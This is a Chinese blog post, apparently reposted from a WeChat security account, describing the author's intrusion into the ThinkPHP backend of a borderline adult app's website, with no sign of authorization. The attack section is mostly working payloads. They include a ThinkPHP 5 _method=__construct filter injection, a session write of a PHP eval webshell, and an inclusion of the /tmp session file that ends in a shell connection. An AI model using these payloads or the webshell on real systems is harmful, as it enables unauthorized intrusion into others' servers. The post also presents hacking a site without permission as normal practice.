【实战】对某擦边站点的一次渗透

admin 2022年11月22日21:47:26安全文章评论33 views1759字阅读5分51秒阅读模式
✎ 阅读须知


乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。

乌鸦安全拥有对此文章的修改、删除和解释权限,如转载或传播此文章,需保证文章的完整性,未经允许,禁止转载!

本文所提供的工具仅用于学习,禁止用于其他,请在24小时内删除工具文件!!!


1. 说明

去年的某一天,在线浏览网页的时候,突然跳转到了一个擦边的界面,然后要下载app,本着弹出即下载的原则,我就欣然安装了: app打开之后是这样的:

【实战】对某擦边站点的一次渗透

看来渗透测试必不可少了。

2. getshell

经过抓包分析,该app的后台地址为:http://www.xxx.com/,对该站点进行分析发现,该站为thinkphp搭建,那还说什么,直接一把梭:

【实战】对某擦边站点的一次渗透

直接就拿到了shell,在连接的时候,发现连接报错:

【实战】对某擦边站点的一次渗透

那在浏览器里直接连接看看:

【实战】对某擦边站点的一次渗透

应该是出了问题,还是手工测试吧:

http://www.xxxx.com/?s=index

post
_method=__construct&method=get&filter[]=phpinfo&get[]=-1
【实战】对某擦边站点的一次渗透

此时发现禁用了非常多的函数:

passthru,exec,system,chroot,chgrp,chown,shell_exec,popen,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv

试试session包含的写shell,教程:

https://xz.aliyun.com/t/10397

先通过session包含写入一句话木马

http://www.xxxx.com/?s=captcha
POST:_method=__construct&filter[]=thinkSession::set&method=get&get[]=<?php eval($_POST['c'])?>&server[]=1

然后利用文件包含去包含session文件,tp5session文件一般都是在/tmp下面,文件名为sess_sessionid

【实战】对某擦边站点的一次渗透

然后接下来的payload

http://www.xxxx.com/?s=captcha
POST:_method=__construct&method=get&filter[]=think__include_file&server[]=phpinfo&get[]=/tmp/sess_eg9xxxxxxxxgsirl&c=phpinfo();
【实战】对某擦边站点的一次渗透

看到这个就算是成功了,蚁剑连接记得加上body:

【实战】对某擦边站点的一次渗透

【实战】对某擦边站点的一次渗透

此时shell连接成功:

【实战】对某擦边站点的一次渗透

【实战】对某擦边站点的一次渗透

连接成功,发现是www权限,但是提权的时候失败。。那就到此为止吧!

【实战】对某擦边站点的一次渗透

新书推荐

【实战】对某擦边站点的一次渗透
【实战】对某擦边站点的一次渗透
《Web渗透测试新手实操详解》

本书以新手实操为出发点,搭建完整虚拟环境:解析58个基本概念+详解19种工具用法+介绍3种攻击方向+给出10项防御建议,从实践经验出发,将复杂内容简单化,突出解决问题的思路,侧重于实操与验证。

【实战】对某擦边站点的一次渗透


点击上方链接,更多优惠等你哦~



tips:加我wx,拉你入群,一起学习


【实战】对某擦边站点的一次渗透


【实战】对某擦边站点的一次渗透

【实战】对某擦边站点的一次渗透
【实战】对某擦边站点的一次渗透

扫取二维码获取

更多精彩

乌鸦安全

【实战】对某擦边站点的一次渗透

原文始发于微信公众号(乌鸦安全):【实战】对某擦边站点的一次渗透

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年11月22日21:47:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  【实战】对某擦边站点的一次渗透 http://cn-sec.com/archives/1424260.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: